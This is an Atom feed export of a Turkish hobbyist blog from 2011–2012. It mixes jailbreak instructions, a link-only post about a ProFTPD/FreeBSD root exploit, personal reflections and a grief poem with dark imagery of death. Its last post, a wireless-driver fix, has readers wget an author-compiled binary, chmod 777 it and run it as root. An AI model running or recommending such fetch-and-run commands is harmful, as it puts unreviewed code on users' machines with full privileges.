<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5764421104616378585</id><updated>2012-03-07T15:54:07.467-08:00</updated><category term='simlock kırma'/><category term='frewal üyelikleri'/><category term='dll'/><category term='java'/><category term='backdoor'/><category term='freebsd root exploit'/><category term='vBulletin hash'/><category term='webdav'/><category term='local'/><category term='backtrack 5'/><category term='security'/><category term='ceh'/><category term='shell code'/><category term='ipad2 jailbreak'/><category term='smf hash'/><category term='jet modem kırma'/><category term='TeamViewer'/><category term='avea jet modem sim lock kırma'/><category term='include'/><category term='msfpayload generator'/><category term='cehturkiye'/><category term='FreWaL'/><category term='r8187'/><category term='iphone 4s jailbreak'/><category term='whmcs hash'/><category term='Unknown error 132'/><category term='freebsd local root'/><category term='backtrack'/><category term='güvenlik'/><category term='untether jailbreak'/><category term='rtl8187'/><category term='localroot exploit'/><category term='dll hijacker'/><category term='backtrack 5 r1'/><category term='iphone 4s windows jailbreak'/><category term='rtl8187 driver'/><category term='java applet'/><category term='frewals'/><category term='sim kilidi kırma'/><category term='frewal blog'/><category term='file'/><category term='ters bağlantı'/><category term='netcat'/><category term='jailbreak'/><category term='iphone 4 untethered jailbreak'/><category term='msfpayload'/><title type='text'>Azıcık Ordan Azıcık Burdan</title><subtitle type='html'>Sıkıldıkça karaladığım , Kimsenin Bilmediği yeni bir blog</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>28</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-1370102643986888453</id><published>2012-02-14T15:57:00.000-08:00</published><updated>2012-02-14T16:01:07.499-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='backtrack 5 r1'/><title type='text'>BackTrack 5 R1 ( harikalar birleşimi )</title><content type='html'>Remote Exploit grubu her seferinde bt yi dahada güçlendirerek sürüm çıkarıyor. BT5 R1 Sürümü tavsiyemdir. kde ve gnome(desktop) şeklinde indirebilirsiniz.&amp;nbsp;Benim pek işime yaramasada içersindeki Gerix çok işinize yarayacaktır&amp;nbsp;. Tanıtım videosu ve indirme linki aşağıda .&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.backtrack-linux.org/downloads/" target="_blank"&gt;indir&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;iframe allowfullscreen="" frameborder="0" height="225" mozallowfullscreen="" src="http://player.vimeo.com/video/23347352?title=0&amp;amp;byline=0&amp;amp;portrait=0" webkitallowfullscreen="" width="400"&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;a href="http://vimeo.com/23347352"&gt;BackTrack 5  - Penetration Testing Distribution&lt;/a&gt; from &lt;a href="http://vimeo.com/offsec"&gt;Offensive Security&lt;/a&gt; on &lt;a href="http://vimeo.com/"&gt;Vimeo&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-1370102643986888453?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/1370102643986888453/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2012/02/backtrack-5-r1-harikalar-birlesimi.html#comment-form' title='2 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/1370102643986888453'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/1370102643986888453'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2012/02/backtrack-5-r1-harikalar-birlesimi.html' title='BackTrack 5 R1 ( harikalar birleşimi )'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-6497275021610200224</id><published>2012-01-21T14:58:00.000-08:00</published><updated>2012-01-21T14:59:33.265-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='iphone 4s windows jailbreak'/><category scheme='http://www.blogger.com/atom/ns#' term='iphone 4s jailbreak'/><category scheme='http://www.blogger.com/atom/ns#' term='ipad2 jailbreak'/><title type='text'>iphone 4s ve ipad2 untether jailbreak</title><content type='html'>Cronic dev team üyesi pod2g ve rüya takımı sonunda coronayı a5 işlemcili telefonlara uygulamayı başardı.&lt;br /&gt;Windows Makineler için ;&lt;br /&gt;&lt;a href="https://sites.google.com/a/iphone-dev.com/files/home/cinject_0.4.3.zip?attredirects=0&amp;amp;d=1" target="_blank"&gt;yazılımı indir&lt;/a&gt;&lt;br /&gt;yazılımı indirdikten sonra içersindeki dosyaları c:\ konumuna atınız.&lt;br /&gt;telefonu hiç bir şekilde dfu moduna almanız gerekmiyor . telefonun&amp;nbsp;tuş kilidini açın ve pc ye bağlayın ; vista ve win7 makineler için başlata cmd yazdıktan sora cmd.exe yi yönetici olarak çalıştırınız . komutları sırası ile yazıyorum açıklamaya gerek yok diye düşünüyorum ; &lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;cd ../..&amp;nbsp; (&amp;nbsp;yönetici çalıştırdığınız için windows system32 dizinine atacaktır amaç c konumuna ulaşmak&amp;nbsp;)&lt;br /&gt;cinject.exe -i payloads/jailbreak.mobileconfig&amp;nbsp;&amp;nbsp; yazın ve entere basın&amp;nbsp;(&amp;nbsp;bu komutu uyguladıktan hemen sonra vpn jailbreak yükle diye bir uyarı çıkacak telefonun ekranında&amp;nbsp;onu uygulayın şifre sorarsa boş geçin . &amp;nbsp;)&lt;br /&gt;kurulumu yaptıktan hemen sonra ;&lt;br /&gt;cinject.exe -j payloads komutunu uygulayın işlem bittikten sora ayarlar menusune gelen vpn yi aktif edin telefon kapanıp yeniden açılınca jailbreaklanmış olacak. son işlem cydia yı çalıştırın ve işlemin tamamlanmasını bekleyin.&lt;br /&gt;&lt;br /&gt;MacOs pc ler için greenp0isonun yazılımı kullanın&lt;br /&gt;&lt;br /&gt;telefonu pc ye bağlayın programı açın ve jailbreak tuşuna basın bütün işlemi program yapacak&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.filesonic.com/file/iMgKsSf/absinthe-mac-0.1.2-2.zip" target="_blank"&gt;macos için indir&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Bu döküman FreWaL tarafından yazılmıştır.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-6497275021610200224?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/6497275021610200224/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2012/01/iphone-4s-ve-ipad2-untether-jailbreak.html#comment-form' title='1 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/6497275021610200224'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/6497275021610200224'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2012/01/iphone-4s-ve-ipad2-untether-jailbreak.html' title='iphone 4s ve ipad2 untether jailbreak'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-5099649379312466090</id><published>2012-01-05T14:36:00.000-08:00</published><updated>2012-01-05T14:36:08.441-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='freebsd root exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='freebsd local root'/><category scheme='http://www.blogger.com/atom/ns#' term='localroot exploit'/><title type='text'>ProFTPD, FreeBSD FTPD Remote Root Exploit</title><content type='html'>FreeBSD 6.2 ve 8.2 arası i386(32bit) ve amd64(64bit) sistemlerde çalışan, FTPD ila ProFTPD servislerinde bir güvenlik açığı yayımlandı. Exploitin çalışabilmesi için hedef sunucuda bir hesap olması yeterli.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://packetstormsecurity.org/files/107410/ProFTPd-FreeBSD-ftpd-Remote-Root.html" target="_blank"&gt;Exploitin Detayları&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-5099649379312466090?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/5099649379312466090/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2012/01/proftpd-freebsd-ftpd-remote-root.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/5099649379312466090'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/5099649379312466090'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2012/01/proftpd-freebsd-ftpd-remote-root.html' title='ProFTPD, FreeBSD FTPD Remote Root Exploit'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-1353770074347489002</id><published>2011-12-30T07:47:00.000-08:00</published><updated>2011-12-30T07:47:42.726-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='iphone 4 untethered jailbreak'/><category scheme='http://www.blogger.com/atom/ns#' term='untether jailbreak'/><category scheme='http://www.blogger.com/atom/ns#' term='jailbreak'/><title type='text'>ios 5.0.1 ve ios 5.0 Untethered Jailbreak ( a4 işlemcili telefonlar )</title><content type='html'>Geçtiğimiz günlerde ios 5.0.1 de bulduğu güvenlik açığı ile süsmü untethered jailbreaklemeyi basaran pod2g elindeki açığı redsn0w ve devteam ile paylaştı. böylece iphone 4s ve ipad2 dışındaki tüm telefonların ios 5.0.1 versiyonu %100 jailbreak olayına kavuşmuş oldu. 4s ve ipad 2 için halen bir gelişme bulunmuyor.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;Telefonunuzu iki şekilde untethered hale getirebilirsiniz ;&lt;br /&gt;&lt;br /&gt;1. yol cydiadan "&amp;nbsp;corona 5.0.1 untether " indirip kurabilirsiniz.&lt;br /&gt;&lt;br /&gt;2. yolu ise redsn0w 0.9.10b1 sürümünü indirerek sistemi yeniden kurabilirsiniz.&lt;br /&gt;&lt;br /&gt;detaylı bilgi ve video için&lt;a href="http://www.redsn0w.us/2011/12/jailbreak-ios-501-untethered-on-iphone.html" target="_blank"&gt; Redsn0w resmi sitesi&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;( thank you pod2g redsn0w and dev-team )&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-1353770074347489002?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/1353770074347489002/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/12/ios-501-ve-ios-50-untethered-jailbreak.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/1353770074347489002'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/1353770074347489002'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/12/ios-501-ve-ios-50-untethered-jailbreak.html' title='ios 5.0.1 ve ios 5.0 Untethered Jailbreak ( a4 işlemcili telefonlar )'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-8127026980000281378</id><published>2011-12-12T17:28:00.001-08:00</published><updated>2011-12-12T17:28:40.834-08:00</updated><title type='text'>Geri Sayım Başladı . . .</title><content type='html'>Son 17 . . .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-8127026980000281378?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/8127026980000281378/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/12/geri-saym-baslad.html#comment-form' title='1 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/8127026980000281378'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/8127026980000281378'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/12/geri-saym-baslad.html' title='Geri Sayım Başladı . . .'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-8936342229742153193</id><published>2011-11-25T17:49:00.001-08:00</published><updated>2011-11-25T17:51:02.197-08:00</updated><title type='text'>26.11.2011</title><content type='html'>Bugun baktımda 8. seneyi geride bıraktık. Çoğu dostumuz haksız yere zarar gördü kendilerine geçmiş olsun dileklerimizi ulaştıramazsakda ailelerine sabır diliyoruz . Zaman su gibi akmaya devam ediyor . Belki birgün dönerim . selametle.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-8936342229742153193?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/8936342229742153193/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/11/26112011.html#comment-form' title='2 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/8936342229742153193'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/8936342229742153193'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/11/26112011.html' title='26.11.2011'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-3238019192823015578</id><published>2011-10-03T16:57:00.001-07:00</published><updated>2011-10-03T16:57:50.397-07:00</updated><title type='text'>Hayat bu işte</title><content type='html'>Bazen susmanın ve konuşmamanın en büyük erdem olduğunu düşünüyorum . o yüzden nadirende olsa buraya yazmayı seviyorum. Allaha emanet.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-3238019192823015578?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/3238019192823015578/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/10/hayat-bu-iste.html#comment-form' title='1 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/3238019192823015578'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/3238019192823015578'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/10/hayat-bu-iste.html' title='Hayat bu işte'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-1375564435084895422</id><published>2011-08-23T09:02:00.000-07:00</published><updated>2011-08-23T09:02:26.205-07:00</updated><title type='text'>Ölüm ben dert okyanusuyum dalga geçme benle.</title><content type='html'>Acaba üstünde olduğum bu ip beni ne kadar taşır?&lt;br /&gt;Gittikçe ağırlaşıyorum huzurla vedalaşıp.&lt;br /&gt;Yokluğunu izliyorum gözümdeki harabeden&lt;br /&gt;Üstünde olduğum ip bigün boynumu kaşır.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;Yanaştığım her saniye uzaklığını gördüm.&lt;br /&gt;Kaderin örümceği ağını sinsice ördü.&lt;br /&gt;Birgün öleceğiz lakin; kadere af buyurup.&lt;br /&gt;itiraz ediyorum: Körsem niye ölümü gördüm?&lt;br /&gt;&lt;br /&gt;Kimisi söndü, kimi hiç yanmamış,&lt;br /&gt;Kimine sevgi bi güneş gibi gelip henüz kararmamış.&lt;br /&gt;Ben bi parça ışığa hasretim yıllardır.&lt;br /&gt;Bu yüzden her satırım; diz çöküş, bi nevi yalvarış.&lt;br /&gt;&lt;br /&gt;Birgün karşıma çık yeni bi senle tanıştır.&lt;br /&gt;Zaman mühim değil nasılsa sensizliğe alıştım.&lt;br /&gt;Nasıl sağ elim kaleme mecbur ise,&lt;br /&gt;Aşk diyetinde olsan dahi, beni arada sırada atıştır.&lt;br /&gt;&lt;br /&gt;Direncim yok hayata umrumda değil yarın&lt;br /&gt;Eğer sesini duymayacaksam yaşamı yok sayarım!&lt;br /&gt;Başkasının evinden gelen çığlıklarına sağırım&lt;br /&gt;Tadına bakamadığım için sana takıldı kursağım&lt;br /&gt;&lt;br /&gt;Canciğer dediklerimiz aratmıyor düşmanı&lt;br /&gt;Annem şu halimi görse yeni ....’ı güç tanır.&lt;br /&gt;Gayret ediyorum da bir parça yok canım&lt;br /&gt;Bir parçada beni anlasanız toplar giderim bohçamı..&lt;br /&gt;&lt;br /&gt;Keşfemediğim denizin en nanide incisi&lt;br /&gt;Senin cennette olman ayakta tutuyor bilincimi.&lt;br /&gt;Bana eminim ordan diyosundur ki&lt;br /&gt;Ya çözüp gel artık şu yalan hayat kelepçeni&lt;br /&gt;&lt;br /&gt;Rabbe verdim dilekçemi ama malesef yaşıyorum.&lt;br /&gt;Seni omzuma verdi annem dediki taşı onu.!&lt;br /&gt;Taşı ki mutlu olsun onu cennete yolcula.&lt;br /&gt;Ama eminim o cennette bile yokluğumu yaşıyodur.&lt;br /&gt;&lt;br /&gt;Bir dünya hayalet ben yaşayan hayalet&lt;br /&gt;Hayatım duman ateş su,bir de senden ibaret.&lt;br /&gt;ölüm bi kehanet – Allahtan ve senden sonra&lt;br /&gt;anam , babam ve kardeşim bana emanet.&lt;br /&gt;&lt;br /&gt;Bu en hakiki ihanet olsa unutur gidersin.&lt;br /&gt;Lan kardeşin toprak altındayken nası rahat edersin.&lt;br /&gt;16 temmuz cuma gününden bu yana tek isteğim.&lt;br /&gt;Bir gece gel rüyama nolur biraz durup gidersin.&lt;br /&gt;&lt;br /&gt;Herkes tastamanda peki ya o nerde?&lt;br /&gt;Nefes aldığım sürece onun kanı kalmaz yerde.&lt;br /&gt;En vicdanlı satırlarım şuan amade emrine.&lt;br /&gt;Ölüm ben dert okyanusuyum dalga geçme benle.&lt;br /&gt;&lt;br /&gt;Hiç inanmadım öldüğüne halada inanmıyorum.&lt;br /&gt;Öldüğünü duyduğum andan beri nefes almıyorum.&lt;br /&gt;Çöle sağnak yağış gibi sana duyduğum hisler!&lt;br /&gt;Yokluğunu bahane edip hertürlü çamura bulanıyorum.!&lt;br /&gt;&lt;br /&gt;Şimdi napıyosun acaba tam şuanda.&lt;br /&gt;Ben seni içime hapsettim işte bak tam şuramda.!&lt;br /&gt;Dua edip kondisyon yapıyorum şu sıra&lt;br /&gt;Çünkü tepesinde saklıyo seni ölüm denen şu rampa!&lt;br /&gt;&lt;br /&gt;Bak şunu anla ! .... seninle öldü!&lt;br /&gt;Belkide dünyada bitek ben yaşarken ölümü gördüm!&lt;br /&gt;Seni tek bi seferde anlatmak ne haddime!&lt;br /&gt;O yüzden seni toprağa değil cennete mektuplara gömdüm !&lt;br /&gt;&lt;br /&gt;Hayat bu kadar ince bir çizgi işte.&lt;br /&gt;Ben bu çizgiden daha kalın olduğum için yazıyorum.&lt;br /&gt;Ve yazdığım için yaşıyorum.&lt;br /&gt;Şu cılız halime bakmayın..&lt;br /&gt;Ben omzumda dünyaları taşıyorum.&lt;br /&gt;İsyanım haşa Allah’a değil ama benim sabır bardağım göz yaşıyla dolu ve bende mecbur böyle arada sırada taşıyorum.&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-1375564435084895422?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/1375564435084895422/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/08/olum-ben-dert-okyanusuyum-dalga-gecme.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/1375564435084895422'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/1375564435084895422'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/08/olum-ben-dert-okyanusuyum-dalga-gecme.html' title='Ölüm ben dert okyanusuyum dalga geçme benle.'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-3874780898521132322</id><published>2011-08-14T15:06:00.001-07:00</published><updated>2011-08-14T15:07:52.417-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='frewals'/><category scheme='http://www.blogger.com/atom/ns#' term='güvenlik'/><category scheme='http://www.blogger.com/atom/ns#' term='frewal üyelikleri'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='FreWaL'/><title type='text'>Farklı Sitelerdeki FreWaL Üyelikleri ile alakalı.</title><content type='html'>Googlede saçma sapan üyelikleri görmekten sıkıldım . Hiç bir sitede üyeliğim bulunmamaktadır çakmalarımdan sakının.&lt;br /&gt;&lt;br /&gt;Görüşürük.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-3874780898521132322?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/3874780898521132322/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/08/farkl-sitelerdeki-frewal-uyelikleri-ile.html#comment-form' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/3874780898521132322'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/3874780898521132322'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/08/farkl-sitelerdeki-frewal-uyelikleri-ile.html' title='Farklı Sitelerdeki FreWaL Üyelikleri ile alakalı.'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-2266220305770315101</id><published>2011-06-18T13:57:00.000-07:00</published><updated>2011-07-14T15:57:51.220-07:00</updated><title type='text'>Melankolia</title><content type='html'>Bu zamana kadar harama el uzatmadım uzatmayacağımda . Ne yazıkki para olmayınca değerde pek olmuyor . Varsın olmasın Hepimiz biliyoruzki aşkta birgün biter arkasından kalan bir kaç kelime ve gözyaşı ne yazıktırki bizler ne mecnunuz nede kerem. Ayrica turkiyede issizlerin is bulabilmesi icin Hz. Ömerin Adalet anlayışının oluşması gerekiyor sanırım :) oda biraz zor görünüyor. Ordan burdan gundeme deyindik.&lt;br /&gt;Selametle.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5764421104616378585-2266220305770315101?l=frewals.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://frewals.blogspot.com/feeds/2266220305770315101/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://frewals.blogspot.com/2011/06/melankolia.html#comment-form' title='1 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/2266220305770315101'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5764421104616378585/posts/default/2266220305770315101'/><link rel='alternate' type='text/html' href='http://frewals.blogspot.com/2011/06/melankolia.html' title='Melankolia'/><author><name>Secret</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-pZ9038xA0vE/T1f0W7xP5fI/AAAAAAAAADw/LJBTTWbCv0I/s220/top_secret1.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5764421104616378585.post-4569091385218970786</id><published>2011-06-11T03:24:00.000-07:00</published><updated>2011-06-11T03:37:28.940-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Unknown error 132'/><category scheme='http://www.blogger.com/atom/ns#' term='r8187'/><category scheme='http://www.blogger.com/atom/ns#' term='rtl8187'/><category scheme='http://www.blogger.com/atom/ns#' term='rtl8187 driver'/><title type='text'>(SIOCSIFFLAGS) failed: Unknown error 132 hatası ve çözümü</title><content type='html'>rtl8187 ve r8187 wireless chipset kullanan arkadaşlar bt4 r2 sürümünden soraki tüm sürümlerde bu hata ile mutlaka karşılaşmıştır. Hata kartın sisteme kayıt edilmeyip kendini kitlemesinden kaynaklanıyor. Çözümü için nette türkçe döküman bulamazsınız. Çözümü çok zor bir hata değil ancak çıldırtan bir hata diyebilirim. hemen yazımıza geçelim &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Yazıma başlamadan önce aşağıdaki tüm işlemleri oto yapabilmek için yazdığım döngüyü yayınlamak istiyorum;&lt;br /&gt;&lt;br /&gt;Ben bu işten bir halt anlamadım diyen arkadaşlara yararı olacağını düşünerek c ile ufak bir döngü yazdım ( Not : kodlama derlenmiştir. ) . Kendimde bu kartı kullandığım için işlemleri hızlandırdığına inanıyorum.&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush:php"&gt;root@bt:~# wget http://fcoder.googlecode.com/svn/wiki/wiress&lt;br /&gt;root@bt:~# chmod 777 wiress&lt;br /&gt;root@bt:~# ./wiress&lt;br /&gt;&lt;/pre&gt;şeklinde çalıştırarak seçiminizi yapmanız yeterli olacaktır.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Yok ben bu işmemi manuel yapmak istiyorum diyorsanız &lt;br /&gt;&lt;br /&gt;Bu sürücüyü 